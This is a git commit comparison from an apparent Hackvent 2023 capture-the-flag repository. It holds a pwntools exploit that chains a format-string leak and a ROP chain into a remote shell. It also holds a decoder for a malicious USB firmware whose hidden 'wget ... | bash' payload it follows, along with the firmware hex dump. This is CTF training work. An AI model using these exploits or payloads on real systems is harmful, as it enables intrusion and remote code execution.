Compare commits

...

10 Commits

Author SHA1 Message Date
2a1e91bd34 Day 21 code 2023-12-27 02:02:54 +01:00
bfa7d360fb Fix Day23 solve 2023-12-26 15:33:18 +01:00
ab7d3f8f8c Day 24 2023-12-26 15:17:56 +01:00
27c8a3f812 Day 23 2023-12-26 15:14:57 +01:00
3e6fbbfa87 Updated libc.so.6 2023-12-22 15:16:07 +01:00
3d8459f0fd removed unnecessary ret gadget 2023-12-22 13:04:00 +01:00
d28f9739a4 Day 22 2023-12-22 12:39:49 +01:00
602762b70a Day 18 2023-12-20 18:50:52 +01:00
d80372c8ff Day 19 added 2023-12-20 18:21:20 +01:00
2bf71ada77 Day 16 2023-12-20 15:47:13 +01:00
34 changed files with 1513 additions and 1 deletions

2
.gitignore vendored

@ -1,3 +1,3 @@
__pycache__
*.pyc
*.sage.py

11
Day 16/Dockerfile Normal file

@ -0,0 +1,11 @@
FROM ubuntu:23.04
RUN apt update && apt -y upgrade
RUN apt install -y socat
COPY . .
RUN chmod +x vuln
RUN chmod +x magic.sh
ENTRYPOINT socat TCP-LISTEN:1337,reuseaddr,fork EXEC:'./vuln',raw

147
Day 16/exploit.py Executable file

@ -0,0 +1,147 @@
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# This exploit template was generated via:
# $ pwn template '--host=152.96.15.8' '--port=1337'
from pwn import *
from hackingscripts import util
import struct
exe = context.binary = ELF(args.EXE or './vuln')
libc = ELF("./libc6_2.37-0ubuntu2.2_amd64.so", checksec=False)
# Many built-in settings can be controlled on the command-line and show up
# in "args". For example, to dump all data sent/received, and disable ASLR
# for all created processes...
# ./exploit.py DEBUG NOASLR
# ./exploit.py GDB HOST=example.com PORT=4141 EXE=/tmp/executable
host = args.HOST or 'b8fb5148-65c8-4306-9341-e2ba20821791.rdocker.vuln.land'
port = int(args.PORT or 1337)
def start_local(argv=[], *a, **kw):
'''Execute the target binary locally'''
if args.GDB:
return gdb.debug([exe.path] + argv, gdbscript=gdbscript, *a, **kw)
else:
return process([exe.path] + argv, *a, **kw)
def start_remote(argv=[], *a, **kw):
'''Connect to the process on the remote host'''
io = connect(host, port)
if args.GDB:
gdb.attach(io, gdbscript=gdbscript)
return io
def start(argv=[], *a, **kw):
'''Start the exploit against the target.'''
if args.LOCAL:
return start_local(argv, *a, **kw)
else:
return start_remote(argv, *a, **kw)
# Specify your GDB script here for debugging
# GDB will be launched if the exploit is run via e.g.
# ./exploit.py GDB
gdbscript = '''
continue
'''.format(**locals())
#===========================================================
# EXPLOIT GOES HERE
#===========================================================
def tell_flag(username, fmt):
if not isinstance(username, bytes):
username = username.encode()
if not isinstance(fmt, bytes):
fmt = fmt.encode()
io.recvuntil(b"> ")
io.sendline(username)
io.recvuntil(b"> ")
io.sendline(fmt)
result = io.recvuntil(b"I will see what I can do...\n")
prefix = b"\x1b[?25h\nSanta: You want me to help you with "
if result.startswith(prefix):
result = result[len(prefix):]
suffix = b"?\nSanta: I will see what I can do...\n"
if result.endswith(suffix):
result = result[:-len(suffix)]
return result
def do_conn(username, fmt):
io.recvuntil(b"(y/n)? ")
io.sendline(b"y")
data = io.recvuntil(b"> ")
lines = data.decode().split("\n")
present_count = {"red": 0, "blue": 0, "yellow": 0}
for line in lines:
match = re.match(r"\s*-\s*(red|yellow|blue)", line.strip())
if match:
color = match[1]
present_count[color] = present_count[color] + 1
io.sendline(str(present_count["red"]).encode())
io.recvuntil(b"> ")
io.sendline(str(present_count["yellow"]).encode())
io.recvuntil(b"> ")
io.sendline(str(present_count["blue"]).encode())
return tell_flag(username, fmt)
io = start()
payload = b""
payload += b"%35$p|%39$p|"
payload += (168 - len(payload)) * b"A"
assert len(payload) == 168
payload += p8(0xA0)
result = do_conn("x", payload)
leak = result.split(b'|')
exe.address = int(leak[0][2:],16) - exe.symbols["main"] - 158
log.info(f"Piebase: {hex(exe.address)}")
libc_leak = int(leak[1][2:],16)+48
libc.address = libc_leak - libc.symbols["__libc_start_main"]
log.info(f"libc leak: {hex(libc_leak)} ")
log.info(f"libc base: {hex(libc.address)}")
# chain for shell
rop = ROP([libc, exe])
rop.raw(rop.find_gadget(['ret'])) # stack align
rop.system(next(libc.search(b"/bin/sh")))
rop.raw(rop.find_gadget(['ret'])) # stack align
rop.call(exe.symbols["tellflag"])
payload = b"A"*168 + rop.chain()
tell_flag("x", payload)
io.sendline(b"ps | grep vuln | awk '{print $1}'")
pid = io.recvline().strip().decode()
print("[+] Got PID:", pid)
io.sendline(f"cat /proc/{pid}/maps | grep heap | awk -F '-' '{{print $1}}'".encode())
heap_base = int(io.recvline().decode(), 16)
print("[+] Got Heap base:", hex(heap_base))
io.sendline(b"exit")
rop = ROP([libc])
rop.raw(rop.find_gadget(['ret'])) # stack align
rop.puts(heap_base + 0x484, )
rop.call(exe.symbols["main"])
payload = b""
payload += 160 * b"A"
payload += p64(0)
payload += rop.chain()
tell_flag("x", payload)
flag = "HV23" + io.recvline().decode().strip()
print("[+] Flag:", flag)
io.close()

Binary file not shown.

Binary file not shown.

BIN
Day 16/vuln Executable file

Binary file not shown.

BIN
Day 18/cat.png Normal file

Binary file not shown.

After

Width:  |  Height:  |  Size: 1.9 MiB

42
Day 18/decode.py Normal file

@ -0,0 +1,42 @@
import requests
import base64
import re
from PIL import Image
from pwn import *
from hackingscripts import util
if __name__ == "__main__":
segment_addr = 0x800100
segment_offset = 0x19
data_size = 0xd8
xor_key = 0x69
data_addr = segment_addr + segment_offset
firmware = ELF("./firmware.elf", checksec=False)
for segment in firmware.segments:
start = segment.header.p_vaddr
end = segment.header.p_vaddr + segment.header.p_filesz
if start <= data_addr < end:
data = segment.data()[segment_offset:segment_offset+data_size]
extracted_data = util.xor(data, xor_key).decode()
break
match = re.match(r"echo (.*) > data", extracted_data)
b64_data = base64.b64decode(match[1].encode()).decode()
match = re.match(r"wget (.*) -O - \| bash", b64_data)
url = match[1]
res = requests.get(url)
match = re.search(r"wget (.*) -O - \| base64 -d > cat.png", res.text)
url = match[1]
res = requests.get(url)
with open("cat.png", "wb") as f:
f.write(base64.b64decode(res.content))
img = Image.open("cat.png")
img.load()
print("[+] Flag:", img.info["Comment"])

BIN
Day 18/evil-usb.zip Normal file

Binary file not shown.

BIN
Day 18/firmware.elf Normal file

Binary file not shown.

486
Day 18/firmware.hex Normal file

@ -0,0 +1,486 @@
:100000000C9429010C9451010C9451010C94510150
:100010000C9451010C9451010C9451010C94510118
:100020000C9451010C9451010C94E2070C9451086A
:100030000C9451010C9451010C9451010C945101F8
:100040000C9451010C9451010C9451010C945101E8
:100050000C9451010C9451010C9451010C9498078B
:100060000C9451010C9451010C9451010C945101C8
:100070000C9451010C9451010C9451010C945101B8
:100080000C9451010C9451010C9451010C945101A8
:100090000C9451010C9451010C9451010C94510198
:1000A0000C9451010C9451010C945101000000007A
:1000B000000000002A2B28000000000000000000C3
:1000C0000000000000000000000000002C9E9F3196
:1000D000A1A2A3B1A5A6B030363837A4271E1F2091
:1000E000212223242526B7B632A7B2ADD484858633
:1000F0008788898A8B8C8D8E8F9091929394959618
:100100009798999A9B9D9CE5EDE600B8000405063A
:100110000708090A0B0C0D0E0F10111213141516F7
:100120001718191A1B1D1CE4F2E7F000080B000257
:100130000202000009040000010202000005240080
:100140001001052401010104240206052406000112
:100150000705810310004009040100020A000000A5
:100160000705020240000007058302400000040367
:10017000090412010002EF02014041233680000110
:100180000102030141726475696E6F204C4C43009B
:1001900041726475696E6F204C656F6E6172646F39
:1001A0000000000000000000002A2B2800000000D2
:1001B000000000000000000000000000000000003F
:1001C000002C9EB4A0A1A2A434A6A7A5AE362D37BC
:1001D00038271E1F20212223242526B333B62EB70D
:1001E000B89F8485868788898A8B8C8D8E8F909125
:1001F00092939495969798999A9B9C9D2F3130A3B2
:10020000AD350405060708090A0B0C0D0E0F101179
:1002100012131415161718191A1B1C1DAFB1B0B5FF
:100220000005010906A1018502050719E029E71566
:1002300000250175019508810295017508810395D6
:10024000067508150025730507190029738100C07C
:10025000B60A11241FBECFEFDAE0DEBFCDBF23E028
:10026000AEE9B2E001C01D92A634B207E1F712E098
:10027000A0E0B1E0E6EAFCE102C005900D92AE39E3
:10028000B107D9F711E0C9E2D1E004C02197FE011E
:100290000E94590CC832D107C9F70E944E0B0C942A
:1002A000510E0C940000CF93DF93FC01818190915B
:1002B0001103482F490F5527551F483051059CF50C
:1002C000A281B381109709F52DE033E033832283B7
:1002D000208120930F038093100380911203820FDB
:1002E000808320911303A22FB09114038A2F821BC5
:1002F0008917E8F481813D91C82FD0E0C45FDE4FBB
:1003000038838F5F8183F2CFD90118962D913C916C
:10031000199721153105C1F72DE033E019963C936B
:100320002E931897D5CF80E0DF91CF91089581E08B
:10033000FBCFFC018091BC02882311F13FB7F894F8
:1003400082E08093E9002091F200822F90E018165D
:10035000190614F481E090E0882339F0289844E6E7
:100360004093BB024091F1004083222339F0209159
:10037000F200211103C02BE62093E8003FBF08954F
:100380008FEF9FEF0895DC01FB0112962C911297DD
:10039000848195812817190641F491818081813AE1
:1003A00031F49D7F81E0913009F080E00895813241
:1003B000E1F79B3029F482811F968C9381E00895A8
:1003C0009A3099F7828150968C93F8CFDC01FB012B
:1003D00088E4808389E4818384E482831D969C91F0
:1003E0001D979F709F5B93831D968D919C9124E038
:1003F000969587952A95E1F78F708F5B848385E0CA
:1004000008958091B30281110DC082E08093AF0204
:1004100084E08093B0021092B2021092B10281E0A7
:100420008093B3028FEA92E008953FB7F8948091E9
:10043000AB029091AC02A091AD02B091AE0226B594
:10044000A89B05C02F3F19F00196A11DB11D3FBF0C
:10045000BA2FA92F982F8827BC01CD01620F711DDB
:10046000811D911D42E0660F771F881F991F4A95D5
:10047000D1F708958F929F92AF92BF92CF92DF9261
:10048000EF92FF924B015C010E9415026B017C010F
:100490000E9415026C197D098E099F09683E734000
:1004A00081059105A8F321E0821A9108A108B108FD
:1004B00088EEC80E83E0D81EE11CF11C8114910463
:1004C000A104B10429F7FF90EF90DF90CF90BF9087
:1004D000AF909F908F9008954091A0025091A102FB
:1004E00020919E0230919F0242175307B4F49091DD
:1004F000E8009570E1F39091E80092FD19C08093B7
:10050000F1008091A0029091A10201968F7399272A
:10051000892B19F48EEF8093E8008091A0029091CE
:10052000A10201969093A1028093A00281E0089518
:1005300080E00895DF92EF92FF920F931F93CF9385
:10054000DF93D82E8A01EB017B01E40EF51ECE1558
:10055000DF0559F0D7FE12C0FE0184910E946C02A3
:1005600021968111F4CF0FEF1FEFC801DF91CF91DA
:100570001F910F91FF90EF90DF9008958881EECF4B
:10058000EF92FF920F931F93CF93DF93FB01208194
:10059000213871F52381223259F5DC0112964C91F4
:1005A000248135814217130619F5EC010B851C8552
:1005B000F12CE12C0115110589F0F80144815581D8
:1005C0006281738180E80E949A028F3F980749F008
:1005D000E80EF91ED8010D911C91ECCF81E08F87B8
:1005E000C701DF91CF911F910F91FF90EF90089578
:1005F00090E080E0F6CFCF93DF93CDB7DEB7699779
:100600000FB6F894DEBF0FBECDBFFC01DB018C91AD
:100610008F5F8C939E012D5F3F4F8DE0D9011D921E
:100620008A95E9F729E0298384E08A8391E09D8314
:1006300083E08E832A8721E22B879C879D879F8773
:1006400022E2288B27E02B8B25E02C8B8E8B20E45D
:1006500030E0388F2F8B998F82818B8395858685AB
:10066000998B8A8B838180688D8B49E150E0BE0134
:100670006F5F7F4F80E00E949A0269960FB6F894F0
:10068000DEBF0FBECDBFDF91CF9108950F931F93B3
:10069000CF93DF931F92CDB7DEB782E0898342E428
:1006A00050E06CE271E080E80E949A020E94010230
:1006B000DC0112960D911C910115110589F0D801EC
:1006C000ED91FC910280F381E02DBE016F5F7F4FC1
:1006D000C801099597FD04C0F80100851185ECCF8C
:1006E00089810F90DF91CF911F910F9108952FB7BE
:1006F000F89487708093E9009091E800892F8072C8
:1007000095FF04C09091F20080E4891B2FBF0895EB
:100710007F928F929F92AF92BF92CF92DF92EF9291
:10072000FF920F931F93CF93DF93C82E8B017A0113
:100730008091BC02811110C08FEF9FEFDF91CF91AC
:100740001F910F91FF90EF90DF90CF90BF90AF90EF
:100750009F908F907F9008958091A40280FF05C0A4
:100760008091E00082608093E000CE2DDF2DD12CBF
:100770008AEFB82E8C2D8770982E8C2D8072882E43
:100780008C2D8074782E9AE3A92E209719F4DD2001
:1007900009F452C08C2D0E94770381110AC0BA94CB
:1007A000BB2051F261E070E080E090E00E943A02EC
:1007B000ECCF8C171D0611F00CF08C2F9FB7F8941E
:1007C0009092E9002091E80025FD02C09FBFDDCF97
:1007D000282F30E0C21BD30B882029F08150A0F0D5
:1007E0001092F100FBCFF801C7FC0AC0815050F015
:1007F00041914093F100FACF44914093F10031963A
:100800008150D0F7020F131FDD2021F0A092E800E5
:10081000D12CDCCF8091E80085FD07C0A092E800D4
:10082000DD24D394209791F2F3CF209779F67720A7
:1008300069F2A092E800CACF5D9884E68093A30293
:10084000C7017CCFEF92FF921F93CF93DF931F924C
:10085000CDB7DEB77C0180911E0381112AC011E063
:10086000109311031093120387E193E09093140304
:1008700080931303109216031092150387E092E001
:1008800090930E0380930D03109219031092180396
:1008900010921B0310921A0310931C0310931D0354
:1008A00081EC809317030E9401020E945301109370
:1008B0001E0382E0898341E050E0BE016F5F7F4FFD
:1008C000809110030E94880397FD08C08091100357
:1008D00048E050E0B70180640E9488030F90DF91E8
:1008E000CF911F91FF90EF900895615030F02091CB
:1008F000F100FC0120830196F8CF289884E68093CC
:10090000BB020895CF93DF93EC0180910B01882304
:1009100031F083E00E9488031816190634F081E054
:1009200090E09B838A8380E090E0DF91CF910895EF
:10093000CF93DF931F92CDB7DEB76983DC01ED91D2
:10094000FC910280F381E02D41E050E0BE016F5F39
:100950007F4F09950F90DF91CF91089583E08093A9
:10096000E9008091F200882319F08AE38093E8007F
:10097000089583E00E94770390E00895CF93DF937A
:100980001F92CDB7DEB7FC018485958597FD08C021
:100990002FEF3FEF358724870F90DF91CF91089598
:1009A000CE0101960E949901019719F4898190E086
:1009B000F3CF8FEF9FEFF0CF0F931F93CF93DF9382
:1009C0001F92CDB7DEB78C01FC018485958597FF1A
:1009D0000BC0CE0101960E949901019771F48981A3
:1009E00090E0F80195878487F801848595850F90BC
:1009F000DF91CF911F910F9108958FEF9FEFF1CF6E
:100A0000FC018485958597FD0BC09FB7F89482E023
:100A10008093E9008091F2009FBF90E001960895D5
:100A20009FB7F89482E08093E9008091F2009FBF25
:100A300090E00895CF92DF92EF92FF920F931F9371
:100A4000CF93DF936C01EB017B01E40EF51E10E008
:100A500000E0CE15DF0581F069916D30D1F3D6014C
:100A6000ED91FC910190F081E02DC6010995892B53
:100A700019F00F5F1F4FEDCFC801DF91CF911F918C
:100A80000F91FF90EF90DF90CF900895EF92FF923B
:100A90001F93CF93DF93EC01162FE8E7E60F68383A
:100AA00088F4862F90E067FF50C0FC01E058F10900
:100AB00021E030E001C0220FEA95EAF78C81822B19
:100AC0008C83E0E08E818E17D9F08F81E817C1F01A
:100AD0008885E817A9F08985E81791F08A85E817D5
:100AE00079F08B85E81761F0DE01169690E080E0E2
:100AF0002D9121115EC08C0F9D1FDC011696EC9389
:100B0000CE0104960E942204EE24E394F12C1838BE
:100B100048F11858DE0186E0112341F016969C91A9
:100B20001697191303C016961C92169781501196AA
:100B30008111F2CFCE0104960E942204C701DF91F9
:100B4000CF911F91FF90EF900895EC85FD85E80F00
:100B5000F91FE491E11119C081E090E09B838A8341
:100B6000F12CE12C812F90E017FF2FC0FC01E05801
:100B7000F10981E090E001C0880FEA95EAF78095DD
:100B80009C8189238C8310E0C5CF8E2F807C803C94
:100B900049F48C8180648C83EF73E23309F092CF47
:100BA000E4E690CFE7FFF9CF8C8182608C83EF770A
:100BB000F4CF01968630910509F09ACF81E090E05C
:100BC0009B838A83F12CE12CA2CFEC85FD85E80F75
:100BD000F91F1491112309F4B1CF812F807C803C3F
:100BE00049F48C818F7B8C831F73123309F092CF71
:100BF00014E690CF17FFF9CF8C818D7F8C831F7700
:100C0000F4CF089590E080E008950F931F93CF9361
:100C1000DF93EC0188819981009759F02A813B810B
:100C20002617370730F081E0DF91CF911F910F91A8
:100C300008958B016F5F7F4F0E94840D009759F0DC
:100C4000998388831B830A832C813D81232B59F749
:100C5000FC011082E8CF80E0E7CFCF93DF93EC0177
:100C600088819981009711F00E94FB0C19821882EB
:100C70001D821C821B821A82DF91CF910895FB0195
:100C800001900020E9F73197AF01461B570BDC01BB
:100C9000ED91FC910280F381E02D09940F931F9355
:100CA000CF93DF93EC010E943F068C016BE172E071
:100CB000CE010E943F06800F911FDF91CF911F91BF
:100CC0000F910895AF92BF92CF92DF92EF92FF9271
:100CD0000F931F93CF93DF93CDB7DEB7C05BD140A7
:100CE0000FB6F894DEBF0FBECDBF8FEF9FEF90938E
:100CF000CA028093C90280E1C82ED12C8E010F5FF9
:100D00001F4FC752DF4F19821882C95DD040C552AC
:100D1000DF4F19821882CB5DD040C352DF4F19825A
:100D20001882CD5DD0404AE0B801C6010E94ED0BAB
:100D3000F80101900020E9F731977F01E01AF10AEC
:100D4000B701CE0187529F4F0E9405068111C4C092
:100D5000CE0187529F4F0E942D061A8219821C8253
:100D60001B821E821D8268E170E0C8010E94050698
:100D70008111C2C0C8010E942D06C752DF4FA88052
:100D8000B980C95DD040A114B10409F4C0C0C352F8
:100D9000DF4FE880F980CD5DD040E114F104B1F07F
:100DA0008D819E81E80EF91EB701C8010E940506DB
:100DB000882309F4ACC029813A818D819E81B501D7
:100DC000820F931F0E944A0EFE82ED82ED80FE800C
:100DD00086E0E80EF11CB701C8010E9405068111EA
:100DE0009AC0C8010E942D064D815E8169817A8179
:100DF0008DEB92E00E9482046BE172E08DEB92E059
:100E00000E943F0689819A81009711F00E94FB0C95
:100E1000C752DF4F88819981C95DD040009711F09A
:100E20000E94FB0C60E87EEE86E390E00E943A02AE
:100E300081E0C81AD10809F064CF6EE372E08DEB4F
:100E400092E00E944E0688EDE9E1F1E0DE01A75252
:100E5000BF4F01900D928A95E1F7FE01E752FF4FD7
:100E6000D8019E012F543E4F99E6819189278D9399
:100E7000E217F307D1F78CEA90E090934103809357
:100E8000400348ED50E0B80184E393E00E941A0566
:100E90006BE172E084E393E00E943F066DE672E04E
:100EA00084E393E00E944E066BE872E084E393E0F3
:100EB0000E944E06C055DE4F0FB6F894DEBF0FBE3F
:100EC000CDBFDF91CF911F910F91FF90EF90DF90F9
:100ED000CF90BF90AF900895C352DF4FF982E88260
:100EE000CD5DD040B801C752DF4F88819981C95D7F
:100EF000D0400E944A0E31CF88E190E09E838D83DE
:100F00006EE172E089819A810E944A0E36CFC80153
:100F10000E942D065BCF29813A818D819E8167E3F6
:100F200072E0820F931F0E944A0EFE82ED825CCF18
:100F30001F920F920FB60F9211242F933F938F930E
:100F40009F93AF93BF938091A7029091A802A09125
:100F5000A902B091AA023091A60223E0230F2D37F7
:100F600058F50196A11DB11D2093A6028093A702FA
:100F70009093A802A093A902B093AA028091AB0219
:100F80009091AC02A091AD02B091AE020196A11D6C
:100F9000B11D8093AB029093AC02A093AD02B093CD
:100FA000AE02BF91AF919F918F913F912F910F9082
:100FB0000FBE0F901F90189526E8230F0296A11DD3
:100FC000B11DD2CF1F920F920FB60F9211248F93A3
:100FD0009F938091E1009091E100937F9093E100D5
:100FE00083FF0FC01092E90091E09093EB00109204
:100FF000EC0092E39093ED001092BC0298E0909385
:10100000F00082FF22C093E09093E9009091F200FB
:10101000992319F09AE39093E8009091A302992301
:1010200041F09091A30291509093A302911101C0BD
:101030005D9A9091BB02992341F09091BB0291502F
:101040009093BB02911101C0289A84FF18C080912F
:10105000E2008E7E81608093E2008091E1008F7ECD
:101060008093E1008091A4028E7E80618093A4022F
:101070009F918F910F900FBE0F901F90189580FF3A
:10108000F7CF8091E2008E7E80618093E2008091B4
:10109000E1008E7E8093E1008091A4028E7E8160CB
:1010A000E5CF1F920F920FB60F921124CF92DF92CD
:1010B000EF92FF920F931F932F933F934F935F9362
:1010C0006F937F938F939F93AF93BF93EF93FF9310
:1010D000CF93DF93CDB7DEB76C97DEBFCDBF109255
:1010E000E9008091E80083FF25C068E0CE014596C5
:1010F0000E94750482EF8093E8008D8987FF39C0D4
:101100009091E80090FFFCCF982F907609F034C1C1
:101110009E894F89588D2F89F88C911131C0803864
:1011200061F58091A5028093F1001092F1008EEF9D
:101130008093E8006C960FB6F894DEBF0FBECDBF6B
:10114000DF91CF91FF91EF91BF91AF919F918F91DF
:101150007F916F915F914F913F912F911F910F91CF
:10116000FF90EF90DF90CF900F900FBE0F901F90E9
:1011700018959EEF9093E800C7CF1092F100D5CF5D
:10118000913059F48111D3CF4130510581F68091CE
:10119000A5028D7F8093A502CACF933049F48111B7
:1011A000C6CF4130510519F68091A5028260F2CF79
:1011B000953041F48091E80080FFFCCF20682093B7
:1011C000E300B5CF963009F0A9C00B8D1C8D22E04D
:1011D0001092E9001092A1021092A002F2122EC009
:1011E00010929F0210929E020E9446031F8299E075
:1011F0009983FA8291E09E8390EA98879AEF998783
:101200002091A0023091A102275F3F4F3C832B83A6
:101210008D831092E9001092A1021092A002109307
:101220009F0200939E0249E050E0BE016F5F7F4F36
:1012300080E00E949A020E94460379CF10939F0299
:1012400000939E020E940102DC0112960D911C91F6
:101250000115110509F451C1D801ED91FC910480EB
:10126000F581E02DBE016B5E7F4FC80109950097A7
:1012700009F03EC1F80100851185EACFF3E0FF12C5
:101280000EC08F89882309F440C0823061F440E8A1
:1012900060E180E991E00E94830A811148CF81E2F8
:1012A0008093EB0047CF813029F440E86BE084E87D
:1012B00091E0F1CF833099F70E940102DC01129690
:1012C000ED90FC908E010F5F1F4F6801E114F10457
:1012D00079F0D701ED91FC910680F781E02DB801FE
:1012E000C7010995080F111DF701E084F184EECFC5
:1012F000D8011C92F60101900020E9F73197BF0157
:101300006C197D0940E0C601C6CF6EE671E0FB01B5
:10131000449150E080E80E949A0209CF973009F486
:10132000BECF983021F481E08093F10000CF993056
:1013300009F0FDCE837009F0B2CFEDE0F1E081E07D
:1013400031E096E32191222371F08093E9003093FC
:10135000EB00DF0111972C912093EC009093ED00AE
:101360008F5F873079F78EE78093EA001092EA006A
:101370008F898093BC02DBCE8B8D9C8D1092E9000F
:101380001092A1021092A00290939F0280939E025D
:10139000898D811192C08E899D89913A49F481325B
:1013A00009F07DCF47E050E064E071E080E0B3CF2A
:1013B000913209F074CF833269F48F89988DB0E04F
:1013C000A0E08093000190930101A0930201B093EB
:1013D0000301ADCE803269F48091E80082FFFCCF3A
:1013E00067E084E091E00E9475048BEF8093E80051
:1013F0009ECE823209F09BCE8F8980930B01EEEF57
:10140000FFE7859194918B3F9C4D51F1E0E0F8E02E
:101410008091040190910501A0910601B09107010E
:10142000803B9440A105B105F1F480910B0180FD52
:101430001AC0EE3F8AE0F80789F587E797E79183BE
:101440008083809160008093A20288E19BE00FB6C8
:10145000F894A895809360000FBE9093600067CECB
:10146000EEEFFAE0D5CF808191818737974709F079
:101470005ECEA89580916000886180936000809125
:10148000A20280936000EE3F2AE0F20789F080918B
:10149000FE0A9091FF0A9183808349CE80819181D9
:1014A0008737980751F29093FF0A8093FE0AC5CFC1
:1014B0001092FF0A1092FE0A3ACE0E940102DC014D
:1014C00012960D911C910115110509F4E8CED80171
:1014D000ED91FC910190F081E02DBE016B5E7F4F9C
:1014E000C8010995811123CEF80100851185EBCF44
:1014F000181619060CF41BCED2CEF1E0FF12BECEA8
:1015000062E771E004CFEF92FF920F931F93CF93A6
:10151000DF93F82E192FE62E042F81E0860F880F17
:101520000E946C0283E00E946C02CF2DD12FEC0E42
:10153000FD2EF11CCE15DF05B9F007FF13C0FE012B
:1015400084910E946C02182F80E00E946C0281231B
:1015500021968111EFCFDF91CF911F910F91FF90D5
:10156000EF9008958881EDCF81E0F5CFCF93109271
:10157000C0021092BF0288EE93E0A0E0B0E080933A
:10158000C1029093C202A093C302B093C40285EF3C
:1015900091E09093BE028093BD028FEF9FEF9093F6
:1015A000CA028093C902109237031092360383E176
:1015B00092E0909335038093340380912C03811142
:1015C00013C0109227031092260381E292E09093B9
:1015D0002903809328038FE290E090932B0380935C
:1015E0002A0381E080932C0380911E0381112AC07D
:1015F000C1E0C0931103C093120387E193E090937D
:10160000140380931303109216031092150387E0BE
:1016100092E090930E0380930D03109219031092A1
:10162000180310921B0310921A03C0931C03C0935B
:101630001D0381EC809317030E9401020E94530155
:10164000C0931E03E0911803F09119033097E9F459
:1016500086E293E0909319038093180380911A0314
:1016600090911B0320912A0330912B03820F931F2B
:1016700090931B0380931A0381EA91E090934103B6
:1016800080934003CF910895FC0180819181009760
:10169000D9F786E293E091838083E0CF789484B594
:1016A000826084BD84B5816084BD85B5826085BD5E
:1016B00085B5816085BD80916E00816080936E00EC
:1016C00010928100809181008260809381008091DE
:1016D000810081608093810080918000816080938F
:1016E00080008091910082608093910080919100B0
:1016F0008160809391008091900081608093900040
:101700008091C10084608093C1008091C10082609B
:101710008093C1008091C10081608093C10080915D
:10172000C30081608093C3008091C0008260809379
:10173000C0008091C20081608093C20080917A00D5
:10174000846080937A0080917A00826080937A002E
:1017500080917A00816080937A0080917A0080681D
:1017600080937A001092BC021092A5021092A402FB
:101770008091D70081608093D70080EA8093D80061
:1017800089B5806189BD89B5826089BD09B400FED3
:10179000FDCF61E070E080E090E00E943A0280912D
:1017A000D8008F7C80618093D8008091E000807F9A
:1017B0008093E0008091E1008E7E8093E1008DE0D7
:1017C0008093E200559A209A0E946206C0E0D0E021
:1017D0002097F1F30E940000FBCFBB274A3031F481
:1017E000992322F4BDE2909581959F4F0C94F90BBB
:1017F000BB27FB015527AA27880F991FAA1FA417EB
:1018000010F0A41B83955051B9F7A05DAA3308F0DE
:10181000A95DA193009779F7B111B1931192CB0112
:101820000C94120CDC01FC01672F71917723E1F716
:10183000329704C07C916D9370836291AE17BF079D
:10184000C8F308952F923F924F925F926F927F92CA
:101850008F929F92AF92BF92CF92DF92EF92FF92C0
:101860000F931F93CF93DF93CDB7DEB7CA1BDB0B6C
:101870000FB6F894DEBF0FBECDBF09942A88398811
:1018800048885F846E847D848C849B84AA84B98418
:10189000C884DF80EE80FD800C811B81AA81B98124
:1018A000CE0FD11D0FB6F894DEBF0FBECDBFED0138
:1018B0000895EE0FFF1F0590F491E02D09940F930A
:1018C0001F93CF93DF938230910510F482E090E074
:1018D000E0914403F091450330E020E0B0E0A0E067
:1018E000309799F42115310509F44AC0281B390BAA
:1018F00024303105D8F58A819B816115710589F104
:10190000FB0193838283FE0111C0408151810281DA
:10191000138148175907E0F04817590799F41097B1
:1019200061F012960C93129713961C933296CF0186
:10193000DF91CF911F910F9108950093440310936D
:101940004503F4CF2115310551F04217530738F004
:10195000A901DB019A01BD01DF01F801C1CFEF014F
:10196000F9CF9093450380934403CDCFFE01E20F5E
:10197000F31F819391932250310939832883D7CF64
:101980002091420330914303232B41F42091150110
:1019900030911601309343032093420320911301A9
:1019A000309114012115310541F42DB73EB7409116
:1019B000170150911801241B350BE0914203F0915F
:1019C0004303E217F307A0F42E1B3F0B2817390738
:1019D00078F0AC014E5F5F4F2417350748F04E0F8B
:1019E0005F1F5093430340934203819391939FCF92
:1019F000F0E0E0E09CCFCF93DF930097E9F0FC01AB
:101A0000329713821282A0914403B0914503ED01F5
:101A100030E020E01097A1F420813181820F931FE4
:101A200020914203309143032817390709F061C020
:101A3000F0934303E0934203DF91CF910895EA01CD
:101A4000CE17DF07E8F54A815B819E0141155105FC
:101A5000B1F7E901FB83EA8349915991C40FD51F7E
:101A6000EC17FD0761F4808191810296840F951F28
:101A7000E90199838883828193819B838A83F0E043
:101A8000E0E012968D919C9113970097B9F52D91F6
:101A90003C911197CD010296820F931F2091420332
:101AA000309143032817390739F6309751F51092D2
:101AB000450310924403B0934303A0934203BCCF69
:101AC000D383C28340815181840F951FC817D907E2
:101AD00061F44E5F5F4F88819981480F591F518390
:101AE00040838A819B81938382832115310509F08C
:101AF000B0CFF0934503E09344039ECFFD01DC019A
:101B0000C0CF13821282D7CFB0E0A0E0EAE8FDE0B8
:101B10000C94240C8C01009751F4CB010E945F0CB3
:101B20008C01C801CDB7DEB7E0E10C94400CFC019C
:101B3000E60FF71F9C0122503109E217F30708F462
:101B40009DC0D901CD91DC911197C617D70798F0A8
:101B5000C530D10530F3CE0104978617970708F3F7
:101B6000C61BD70B2297C193D1936D937C93CF0162
:101B70000E94FB0CD6CF5B01AC1ABD0A4C018C0E47
:101B80009D1EA0914403B0914503512C412CF12C92
:101B9000E12C109731F58091420390914303881511
:101BA000990509F05CC04616570608F058C08091A8
:101BB000130190911401009741F48DB79EB74091A5
:101BC000170150911801841B950BE817F90708F0CD
:101BD00055C0F0934303E0934203F901718360839E
:101BE000A0CF8D919C91119712966C90129713969D
:101BF0007C901397A815B90559F56C0142E0C40E05
:101C0000D11CCA14DB0420F1AC014A195B09DA01CA
:101C10001296159780F06282738251834083D901B6
:101C20006D937C93E114F10471F0D7011396FC934A
:101C3000EE93129776CF22968C0F9D1FF901918318
:101C40008083F301EFCFF0934503E093440369CF22
:101C50004816590608F42C017D01D3019ACFCB0117
:101C60000E945F0C7C01009749F0AE01B8010E9410
:101C7000410EC8010E94FB0C870153CF10E000E029
:101C800050CFFB01DC0102C001900D924150504049
:101C9000D8F70895FB01DC0101900D920020E1F7D7
:061CA0000895F894FFCF47
:101CA600FFFFFFFF00E100000000000000C180818F
:101CB6000000000000460380000C0A0106490D5B87
:101CC6000D050D2A2B060D213B1E0A13061F255B4B
:101CD6000D190A5A381C335B055908213F000D318E
:101CE60027050A04271F0B073B050B07381C305B2B
:101CF600501D255B0D19303E5C1B0B213F0725133C
:101D06003302303D3013303D285A272E3C5B2703E3
:101D16002302262D3010243E3811245B3304275B22
